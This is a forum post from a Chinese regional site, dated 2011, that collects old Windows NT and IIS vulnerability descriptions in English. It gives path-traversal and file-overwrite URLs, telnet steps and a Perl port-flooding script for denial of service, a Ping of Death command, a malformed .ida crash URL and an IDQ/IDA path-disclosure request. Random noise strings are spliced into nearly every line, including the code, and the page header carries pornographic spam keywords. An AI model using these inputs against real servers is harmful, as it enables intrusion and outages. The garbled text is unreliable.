久久综合伊人噜噜色,日本三级香港三级人妇电影精品,亚洲中文色资源,国产高清一区二区三区人妖

      <small id="r7w9x"></small>
          <td id="r7w9x"></td><sub id="r7w9x"><menu id="r7w9x"><samp id="r7w9x"></samp></menu></sub>
        1. <th id="r7w9x"></th>
          1.  找回密碼
             注冊

            QQ登錄

            只需一步,快速開始

            NT的漏洞及描述(英文)

            [復(fù)制鏈接]
            1#
            發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序?yàn)g覽 |閱讀模式
            受影響系統(tǒng):4.0,iis 1.0
            ! e7 B2 P& v2 N% pA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
            4 ?/ j3 h2 y3 H9 C) E- U/ A5 t
            2 X) C# h! b+ y9 g- ^' r/ tA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
            - e; j5 h1 E3 F! f8 G$ T3 J
            7 S% N7 d5 f. f, B% `7 Q) \By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.- Q2 d" t# c! O+ r7 Y" n2 d8 c7 M+ Z
            + |) D8 D0 |$ t' A9 @
            --------------------------------------------------------------------& \- T$ ~9 E; w" e

            ' B5 F. S( q9 }受影響系統(tǒng):4.0
            5 `8 K6 C6 a+ W9 t) IA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''., I, S' ~  `9 @8 ]4 q+ Y' P# {* k
            2 K8 s4 e* w- {4 B0 H3 `% M- b5 u1 \
            If the file 'target.bat' exists, the file will be truncated.
            5 t: j0 g8 m2 A/ t+ g* Z' _2 @6 q- |$ B" G
            5 f: M) u3 W; ]
            A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
            ' }! E& @( ?6 r% Z4 h# {8 C  o$ ?, p9 M/ J; R) _
            ----------------------------------------------------------------------
            " ?+ S2 W* Z; _0 n! h" m$ u
            9 I4 q" S3 I) A# y# ?* |1 c受影響系統(tǒng):3.51,4.0( I5 `; H4 D0 [- j- s
            Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
            - [( `7 v) f' M7 W: Q& S" d' Q9 E# Z# o  C" _
            The following steps;* p% ^/ d4 E: r
            3 x5 d% D- X" l
            Telnet to an NT 4.0 system on port 135
            8 o2 m4 d* \# p5 E, ^Type about 10 characters followed by a <CR> / i4 E/ ^8 T5 L% [- S
            Exit Telnet
            / A# t7 l: f( d/ Nresults in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
            0 `4 ]  x: D# G) |. Y, ]9 H9 P) v5 r, B- C1 C" C
            When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.6 g& P6 A" f0 O

            # f9 S& {0 t1 e* T+ |' O( N7 MThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.. l8 _3 k( S- ]$ i, I
            $ _. E# r. F) x2 L
            If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
            , z4 c' O  Y- c- ^8 t
            5 g2 s/ s, I, j1 U. X+ x: jThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):$ u3 O4 s' Z/ I. q( H
            9 A8 A0 q) q( T
            /*begin poke code*/
            5 l: A) ~! ?; ?$ z' i2 h) M
            . ~* V, C9 h, E7 b' S  k/ {$ {) Muse Socket;; z, m+ Y) w3 [( N4 T
            use FileHandle;& M. \8 B) m4 M( @3 d% k) l6 X: Z; ]0 a
            require "chat2.pl";- i1 r0 Z  m/ z) b" ?7 o; `

            + o7 o' ]* f9 N1 c) @5 I( K$systemname = $ARGV[0] && shift;
            ; ?8 ?2 q9 g4 E0 ^! M$ y. c
            # K- e7 z7 u3 m  l: t$verbose = 1; # tell me what you're hitting3 O4 L% B$ |" }: v( K8 R$ J
            $knownports = 1; # don't hit known problem ports8 p* Y1 H5 `3 C* L0 ]3 [( _
            for ($port = $0; $port<65535; $port++) # |+ X' |6 n. e, L! G
            {( X% U' I" H* P' N; h) p

            ; J9 B: o' ^4 F# s/ H: N6 R1 Y5 ~& l3 b- w( p  J* R& E0 [$ Y
            if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
            # t: W$ \1 {! y( L5 Q8 Onext;, r4 I  P/ V; B' g
            }$ K# U0 P* U* G9 a* o5 L4 C+ |' m
            $fh = chat::open_port($systemname, $port);
            . g  o, Q- @+ A3 ?2 L" ?+ Lchat::print ($fh,"This is about ten characters or more");6 I& {6 F* A" A& b5 q% K1 J
            if ($verbose) {: g( i+ @0 z2 H& q9 N- w
            print "Trying port: $port\n";
            5 I6 S* b% i+ T* `}
              p" G) u' ~  h8 M! Mchat::close($fh);; p# f0 U6 {! D
            + |1 Y3 W8 f$ ~& k7 t+ ^; y
            }2 M+ b8 S! n0 Q( {: ^% N; K

            4 W* r$ n7 r5 J: |& m! T% l7 e. {
            /*end poke code*/
            1 ?1 x$ G/ L; O
            4 Z, G/ P/ A8 x: D/ O- J6 LSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
            * i$ p/ P& y" Q+ U" Y  v. D
            % t/ R1 J' n5 j% V- z- F# b0 I--------------------------------------------------------------------------------% K4 l$ W# w9 Q4 A8 \& @

            ) k- {  H6 M7 g! X' U受影響系統(tǒng):4.0; y1 o$ C) c6 N  k4 ^. n
            Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
            $ {1 d+ g2 L! A, m
            , V0 W# C( e7 Q7 h! BThis attack causes Dr. Watson to display an alert window and to log an error: 9 D% }& R1 [# R! z) C7 O: t

            9 Z; E  v6 j% V: Q* }) [+ K"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"4 z2 f# j2 _- }1 {& |

              N, w% Q) k! e6 i- s! ]0 W--------------------------------------------------------------------------------
            0 K+ ]+ T( m. o5 @( |* R& H2 `5 r# s
            : C( |/ Y% E6 e3 _! ^4 p受影響系統(tǒng):3.51,4.09 e' j& Z  Z" }' w( I" G1 M" _
            Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
            ; y& o/ ~) ]' ?+ b* A+ w8 {- N# T4 y- `) z3 f0 T/ e; `
            STOP: 0X0000001E
            - W7 `  B( [& F6 z7 NKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS* K- H) Q' I9 M1 k+ q3 M
            0 X- H6 y0 a) j
            -OR-& h" Q5 k1 {: w7 q! C

            * \: U8 I8 Z1 d5 DSTOP: 0x0000000A- |( c& W4 ?5 G. ^( {8 L6 Z( a4 B* r
            IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
            # ]- F5 C  D8 x
            / E4 M( u; `  I3 r( T8 d' C  X! s1 zNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
            ! q7 s, m  X# O& m+ E. ^0 c0 H: g) X2 `
            --------------------------------------------------------------------------------
            1 h7 D: Z& d' }8 V% `; X
            $ E* l1 ~# @  J8 o1 EMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). - s/ [+ s2 t& M* a

            . B  g& P, T( h# W--------------------------------------------------------4 Y( C7 P" q- A

            . `) V3 d, E* \+ c/ ^% AIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
            您需要登錄后才可以回帖 登錄 | 注冊

            本版積分規(guī)則

            QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機(jī)版|小黑屋|汶上信息港 ( 魯ICP備19052200號(hào)-1 )

            GMT+8, 2025-9-16 14:24

            Powered by Discuz! X3.5

            © 2001-2025 Discuz! Team.

            快速回復(fù) 返回頂部 返回列表